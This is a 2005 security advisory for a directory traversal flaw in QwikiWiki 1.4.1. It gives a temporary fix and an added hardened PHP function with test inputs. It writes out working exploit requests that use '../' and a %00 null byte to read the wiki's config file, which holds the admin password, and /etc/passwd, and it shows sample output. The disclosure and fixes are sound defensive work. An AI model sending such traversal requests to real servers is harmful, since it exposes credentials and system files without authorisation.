Message-ID: <41DAEF1D.5090907@iname.com>
From: madelman at iname.com (Madelman)
Subject: QWikiwiki directory traversal vulnerability


Title: QWikiwiki directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 01/01/2005
Severity: Critical

Summary:
--------

QwikiWiki is driven by one core design goal: simplicity. This design
goal is codified into three key principles:
- Self Sufficiency: QwikiWiki requires only a web server and PHP.
- Zero-Edit Deployment: QwikiWiki is immediately usable "out of the box".
- Minimalist Featureset: QwikiWiki is not everything to everybody.

QwikiWiki uses only cookies and the file system, and thus does not
require a MySQL server or any other database support. Data is stored in
simple text files, and backups are just complete copies of the data
directory. Ain't nothing fancier than it need be.
(from vendor site: http://www.qwikiwiki.com)

QWikiwiki does not validate the page parameter, which allows an attacker
to read any file the web server process can read.

This vulnerability has been tested with QWikiwiki 1.4.1.


Details:
--------

To read the QWikiwiki admin password:

REQUEST:
http://[SERVER]/qwiki/index.php?page=../_config.php%00
RETURNS (visible in the HTML source):
[...]
$QW_CONFIG['title'] = "QwikiWiki";
$QW_CONFIG['adminName'] = "David Barrett";
$QW_CONFIG['adminPassword'] = 'changeme!'


Any file the web server has permission to read can be retrieved the same way:

REQUEST:
http://[SERVER]/qwiki/index.php?page=../../../../../../etc/passwd%00
RESPONSE:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]


Solution:
--------

Temporary fix:
In file _wikiLib.php, replace

function QWCreateDataPath( $page, $extension )
{
    return 'data/'. $page . $extension;
}

with

function QWCreateDataPath( $page, $extension )
{
    // Refuse any page name containing a parent-directory component.
    if (strpos($page, "..") === false) {
        return 'data/'. $page . $extension;
    } else {
        return '';
    }
}
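
A stricter replacement for the same function, added here as an example and not part of the advisory or of QwikiWiki's own code. It treats the page name as an identifier rather than a path fragment, so slashes, dots and NUL bytes are rejected before any path is built. It assumes the data/ directory sits beside the script, that the wiki only ever passes the two extensions listed (an assumption, adjust to the real ones), and it returns an absolute path rather than the original relative one:

```php
<?php
// Added example, not QwikiWiki's own code. Hardened QWCreateDataPath():
// the page name must be a plain word, and the final path is re-checked
// against the canonical data/ directory as defence in depth.

function QWCreateDataPath($page, $extension)
{
    $dataDir = realpath(__DIR__ . '/data');   // assumption: data/ beside this file
    if ($dataDir === false) {
        return '';
    }
    // 1. Allowlist the page name. Anything that is not [A-Za-z0-9_-]
    //    (so "/", ".", "\0", "%" ...) is refused outright.
    if (!is_string($page) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $page)) {
        return '';
    }
    // 2. The extension comes from the caller, never from the request;
    //    still restrict it to the values the wiki is expected to use.
    if (!in_array($extension, ['.txt', '.html'], true)) {   // assumption
        return '';
    }
    $path = $dataDir . DIRECTORY_SEPARATOR . $page . $extension;
    // 3. If the file exists, confirm its canonical path is still inside
    //    data/ (guards against a symlink planted in the data directory).
    if (file_exists($path)) {
        $real   = realpath($path);
        $prefix = $dataDir . DIRECTORY_SEPARATOR;
        if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
            return '';
        }
    }
    return $path;
}

// Constructed inputs mirroring the advisory's requests (PHP has already
// decoded %00 into a literal NUL byte by the time $_GET is populated).
$samples = [
    'HomePage'                     => 'accepted',
    '../_config.php'               => 'rejected',
    "../_config.php\0"             => 'rejected',
    '../../../../../../etc/passwd' => 'rejected',
];
foreach ($samples as $page => $expected) {
    $result = QWCreateDataPath($page, '.txt') !== '' ? 'accepted' : 'rejected';
    printf("%-32s %-8s (expected %s)\n", addcslashes($page, "\0"), $result, $expected);
}
```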


Timeline:
--------

01/01/2005 - Vulnerability found
01/01/2005 - Vendor contacted
01/01/2005 - Vendor confirmed bug
04/01/2005 - Bug published in vendor page and advisory released